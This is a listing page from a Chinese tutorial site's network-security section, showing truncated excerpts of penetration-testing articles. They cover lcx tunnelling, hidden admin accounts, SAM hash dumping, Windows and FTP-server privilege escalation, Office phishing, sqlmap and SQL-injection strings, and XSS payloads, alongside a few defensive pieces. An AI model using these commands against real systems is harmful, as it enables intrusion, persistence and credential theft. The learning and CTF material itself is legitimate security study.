经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
 网络安全

lcx 内网转发

把放置到已经控制的内网主机 执行  内网主机输入命令 lcx.exe -slave 外网ip 外网端口 内网ip 内网端口 lcx.exe -slave 30.1.85.55 2222 127.0.0.1 3389   外网主机输入命令 lcx.exe -liste...[2019/5/31]

创建超级隐藏用户

  1.先通过命令创建隐藏账户 net user test$ 123.com /add 在net user   发现看不到用户 但是 在用户组是可以看到的 先把加入管理员组在禁用 我们可以把用户命名成上面一样的用户名&n...[2019/5/31]

Java使用Cipher类实现加密,包括DES,DES3,AES和RSA加密

一、先看一个简单加密,解密实现 1.1 加密 /** * content: 加密内容 * slatKey: 加密的盐,16位字符串 * vectorKey: 加密的向量,16位字符串 */ public String encrypt(String content, Str...[2019/5/30]

SqlMap常用参数(一)

sqlmap可谓是利用sql注入的神器了,sqlmap的参数很多,接下介绍几种常见的参数。 一。注入acce 数据库常用的参数 sqlmap.py -u "url"  判断参数是否存在注入 sqlmap.py -u "url" --tables 猜解表名 sqlmap...[2019/5/30]

如何利用开源风控系统(星云)防止撞库?

 在企业发展过程中,日益增多的业务形态往往会招致新的业务风险。简单的业务防护已经不足以解决问题。一套完整的业务风控系统可以帮助企业有效的规避风险,降低损失。 TH-Nebula(星云)是威胁猎人开源的业务风控系统。在业务安全应用门槛普遍过高的当下,我们希望以开源的方式,降低大家的...[2019/5/30]

明文存储密码,为何连谷歌也无法杜绝?

1.一些小网站或许数据库会明文存储密码,而知名互联网公司绝无可能,但后者的业务系统颇为复杂,关联功能可能意外隐藏着明文存储漏洞,因此例行安全检测都额外注意这点。 2.尽管大公司多数明文存储漏洞没有造成影响,但也有漏网之鱼,被外界捕捉。 3.明文存储密码漏洞的主要由灯下黑、设计考虑不周、历史遗留、过...[2019/5/29]

web安全之windows系统基础

1.系统目录 (1)一个存放账号密码的文件: Window System32/config/SAM (2)hosts文件 Window System32/driver etc/hosts 利用hosts文件可以进行域名欺骗和钓鱼,前提是你已经进入被攻击者的windows操作系统...[2019/5/29]

MS09-012 PR提权

 漏洞编号:MS09-012 披露日期: 2009/4/14 受影响的操作系统:Windows 2008 x64 x86;XP;Server 2003 sp1 sp2; 测试系统:windows 2003 x86         上传到...[2019/5/28]

MS09-020 iis6.0提权

漏洞编号:MS09-020 披露日期: 2009/6/9 受影响的操作系统:Windows 2003 x64 sp1 sp2;XP; 测试系统:windows 2003 x64   上传 执行 iis6.0.exe  "net user temp 123.com /...[2019/5/28]

证券secuerity英语secuerity安全

中文名:证券 外文名:security、secuerity 类别:经济权益凭证统称 组成:资本证券、货币证券和商品证券 作用:用来证明持者权益的法律凭证 图集 目录 1 发展历程 ? 世界 ? 中国 2 基本特征 3 分类 ? 性质分类 ? 收益...[2019/5/27]

提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享

先罗列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插...[2019/5/27]

MS12-042 用户态调度机制特权提升漏洞

MS12-042 用户态调度机制特权提升漏洞

漏洞编号:MS12-042 披露日期: 2012/6/12 受影响的操作系统:Windows 2000;XP;Server 2003;windows 7;Server 2008; 测试系统:windows 7 x64   利用网上现有的提权工具 测试 运行tes...[2019/5/27]

windows 抓hash获取管理员密码

windows 抓hash获取管理员密码

webshell 找能执行权限的目录上传 C:\Windows\System32\config\sam 内有windows 密码 利用工具把密码抓出来 samcopy 直接抓取 GetHASHES.exe $Local 返回当前系统所有的用户的哈希 pwdump7.exe 自...[2019/5/22]

CVE-2019-0808内核漏洞原理利用分析

CVE-2019-0808内核漏洞原理利用分析

漏洞概述 CVE-2019-0808是微软在2019年3月修补的内核漏洞,该漏洞只影响Windows 7和Windows Server 2008,漏洞允许攻击者提升权限并在内核模式下执行任意代码。在谷歌威胁分析团队的报告中发现该漏洞用于进行Chrome沙箱逃逸,和CVE-2019-5786 C...[2019/5/22]

第三方应用 flashfxp,filezilla提权

第三方应用 flashfxp,filezilla提权

filezilla 提权 filezilla 开源的ftp服务器 默认监听14147端口 默认安装目录下有个敏感文件 filezillaserver.xml(包含用户信息) filezillaserver interface.xml(包含了管理信息) 提权思路: 下载两个文...[2019/5/21]

Excel的IYQ钓鱼

Excel的IYQ钓鱼 0x00 环境准备 操作系统:windows7 microsoft office版本:office 2010 0x01 了解IYQ的基本概念 可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQ...[2019/5/21]

第三方软件 G6ftp提权

步骤 1.下载配置文件 将administrator 2.利用lcx 端口转发 默认只允许本机连接 3.lcx.exe -tran 8027 127.0.0.1 8021 4.使用客户端以管理员用户登录 5.创建用户并权限设置和执行批处理文件 6.上传批处理 7.创建普...[2019/5/20]

文件上传绕过(旧)

文件上传绕过(旧)

1.js 验证 修改js 2.后缀名黑名单 比如: $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pH...[2019/5/20]

windows 系统对应的内核版本和自带 iis 版本

Windows 10 10.0* Windows Server 2016 10.0* Windows 8.1 6.3* Windows Server&nbs...[2019/5/20]

第三方软件 Serv-u提权

  Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等   Serv-U提权分两种 1.有修改权限 2....[2019/5/20]

第三方软件 pcanywhere提权

pcanywhere 是一个远程管理软件 1.访问pcanywhere默认安装目录 访问 下载打开 利用破解工具直接 选择刚刚下载的软件 点破解 拿到用户密码后去百度下载客户端让后连接 原文链接:http: www.cnblogs.com/yuanzij...[2019/5/20]

Word模板注入攻击

Word模板注入攻击 0x00 工具准备 phishery:https: github.com/ryhanson/phishery/releases office版本:office 2010 0x01 什么是Word模板注入攻击 Word模板注入攻击就是利用Word文档加载附加模板时...[2019/5/17]

MySQL基于报错注入2 - APT-101

  目标站点:   0x1 注入点判断 http: www.xxxxxx.com/page ervices.php?id=1 #true http: www.xxxxxx.com/page ervices.php?id=1'' #false ...[2019/5/10]

MySQL报错注入总结 - APT-101

mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 报错注入:(and后不能直接跟select,可以加()) 1.报错注入floor---->(s...[2019/5/9]

SQLMAP之tamper详解 - APT-101

sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 PS:工具既然叫做工具,就是用来辅助上单的,呸辅助我们完成某些任务的,仅仅适用于当进行某些重复的繁...[2019/5/9]

MySQL基于报错注入 - APT-101

 0x1 判断注入点: http: www.xxxx.ro .php?id=1'' 那么尝试闭合下单引号 http: www.xxxx.ro .php?id=1'' --+   0x2 枚举下表的列 http: www.xxxx.ro .ph...[2019/5/9]

SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101

SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101

一、SQLMAP用于Acce 数据库注入 python sqlmap.py -u "http: www.xxx.com/en/CompHonorBig.asp?id=7" python sqlmap.py -u "http: www.xxx.com/en/CompHonorBig.asp?i...[2019/5/8]

union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单

   这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下。    首先推荐一篇文章“https: blog.csdn.net/Litbai_zhang/article/detail 83869918” ...[2019/5/8]

实验吧简单的SQL注入1,简单的SQL注入

接上面一篇博客。 实验吧简单的sql注入1 题目连接   http: ctf5.shiyanbar.com/423/web/   同样,直接输入 1加个但引号,结果下面有返回错误,         ...[2019/5/8]

通过user.MYD MySQL密码 - APT-101

  具体的获取方法:   1)通过hex 十六进制的工具打开user.MYD文件 这里使用:0XED   2)复制MySQL密码出来,进行分析 *CEAF6E9FA3A448A25AC9D00C8D7078385 #33位 前面带...[2019/4/30]

源码安全:悬在大厂头上的达摩克利斯之剑

本文首发于 CODING 官方微信公众号—— 《源码安全:悬在大厂头上的达摩克利斯之剑》 “ Please help us!!!” 从 B 站源码泄露开始到 GitHub 最终删除代码的两小时,大概是今年 B 站最煎熬的时刻,以至于他在向 Github 求助删除的 DMCA 邮件中,在...[2019/4/30]

涨姿势:抛弃字母、数字和下划线写SHELL - APT-101

涨姿势:抛弃字母、数字和下划线写SHELL - APT-101

PHP中异或 (^) 的概念 <?php echo"A"^"?";?> <?php echo"A"^"?";?> 输出的结果是字符 “~”,这是因为代码对字符 “A” 和字符 ...[2019/4/30]

win10 DVWA下载安装配置(新手学渗透)

  电脑重装系统了,需要重新装一下渗透测试的学习环境DVWA,借此机会就跟大家讲一下DVWA的安装过程,因为不同的电脑配置、环境不同,在我的电脑上按照我这个安装教程是一次性就安装好了的。如果安装的时候遇到了什么问题,欢迎大家在评论区讨论,我每天都会查看博客,看到了能解决我就会回复。 安装过程总共...[2019/4/29]

跨站脚本攻击XSS原理与防范实例分析

跨站脚本攻击XSS原理与防范实例分析

本文实例讲述了跨站脚本攻击XSS原理与防范。分享给大家供大家参考,具体如下: 跨站脚本攻击(Cro Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的...[2019/4/28]

pwn学习(1)

0x00 简介 入职之后,公司发布任务主搞pwn和re方向,re之前还有一定的了解,pwn我可真是个弟弟,百度了一番找到了蒸米大佬的帖子,现在开始学习。 0x01 保护方式 NX (DEP):堆栈不可执行 ASLR:内存地址随机化,在linux和pie相结合,aslr是系统是否开启,有0.1...[2019/4/26]

SQL过滤字符后手工注入漏洞测试(第1题) - APT-101

  https: www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe   分析题目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!!  ...[2019/4/24]

SQL注入渗透实战 - APT-101

概述:   判断注入点: http: www.xxxxx.com/page.php?pid=42 and 1=1 #true     http: www.xxxxx.com/page.php?pid=42 and 1=2 #false ...[2019/4/24]

从B站的代码泄露事件中,我们能学到些什么?

先声明一下,本文不聊ISSUE中的七七八八,也不聊代码是否写的好,更不聊是不是跟蔡徐坤有关之类的吃瓜内容。仅站在技术人的角度,从这次的代码泄露事件,聊聊在代码的安全管理上,通常都需要做哪些事来预防此类事件的发生。同时,大家在阅读本文的时候,也可以深入思考下,自己团队是否也存在类似的问题,经过这次的...[2019/4/23]

Google XSS Challenge - APT-101

Google XSS Challenge - APT-101

  https: x -game.appspot.com/level1     https: x -game.appspot.com/level1 payload: <svg onload=alert(1)> https...[2019/4/23]

RFI to RCE challenge - APT-101

RFI to RCE challenge - APT-101

  http: www.zixem.altervista.org/RCE/level1.php     构造payload: https: zixem.altervista.org/RCE/level1.php?page=https: raw.githubu...[2019/4/22]

XSS Challenges xss-quiz.int21h.jp - APT-101

概述: https: x -quiz.int21h.jp/   Stage #1 payload: <script>alert(document.domain);< cript>   Stage #2 http: x -q...[2019/4/22]

Challenges-XSS - APT-101

https: alf.nu/alert1   warmup   adobe   JSON   原文链接:http: www.cnblogs.com/hack404/p/10742031.html[2019/4/22]

常见的web攻击手段总结

xxs攻击(跨站脚本攻击)   攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时脚本程序便在浏览器上执行,盗取客户端的cookie、用户名密码、下载执行病毒木马程 序 解决:   我们可以对用户输入的数据进行HTML转义处理,将其中的尖括号、单引号、引号之类的特殊字符进行编码 Csrf攻...[2019/4/22]

Multi Reflection (Pro Only) - APT-101

Case 14 - Double Injection in HTML Context with Double Quotes https: brutelogic.com.br/multi/double-html.php?p="</a><svg onload=alert(1)&g...[2019/4/18]

DOM-based XSS Test Cases - APT-101

DOM-based XSS Test Cases - APT-101

Case 23 - DOM Injection via URL parameter (by server + client) https: brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)> https: br...[2019/4/18]

常见的7种XSS - APT-101

1. URL Reflection 当URL以某种方式反映在源代码中时,我们可以添加自己的XSS向量/有效负载。对于PHP页面,可以使用斜杠字符(/)在页面名称之后添加任何内容 http: brutelogic.com.br/x .php/”><svg onload...[2019/4/16]

xss小结-从xss平台搭建到csp规则

0x00前言 x 是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的作用,测试的时候我们是用alert(1)弹窗,而做CTF也好,实际中的漏洞利用也好一般是用x 获取管理员的cookie   0x01x 平台搭建 网上有x 的在线平台,但是别...[2019/4/15]

Security+高分考过经验分享812分

  Security +也是无意中从谷安的宣传单知道的,本来就是想从事安全的行业,而且Security +含金量高,是国际认可的认证就想着去考一考试试。   大概从2018.12开始正式准备的,前面时间都是停停看看的那种,因为本身自己也是学生课业量也很大除了每天上课...[2019/4/15]

web安全入门课程笔记——SQL漏洞分析与利用

web安全入门课程笔记——SQL漏洞分析与利用

3-1SQL语言基础 3-2ACCESS手工注入  And1=1是什么意思:进入数据库查询信息,判断是否存在注入点。 Exists(select*from admin):查询语句   3-6MySQL手工注入   ...[2019/4/15]

MSF里MS17_010利用模块笔记

MSF里MS17_010利用模块笔记

1.   auxiliary canner mb mb_ms17_010      扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxiliary/adm...[2019/4/15]

124
8
记录数:557 页数:7/12首页上一页234567891011下一页尾页
 友情链接:直通硅谷  点职佳  北美留学生论坛
加载更多

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号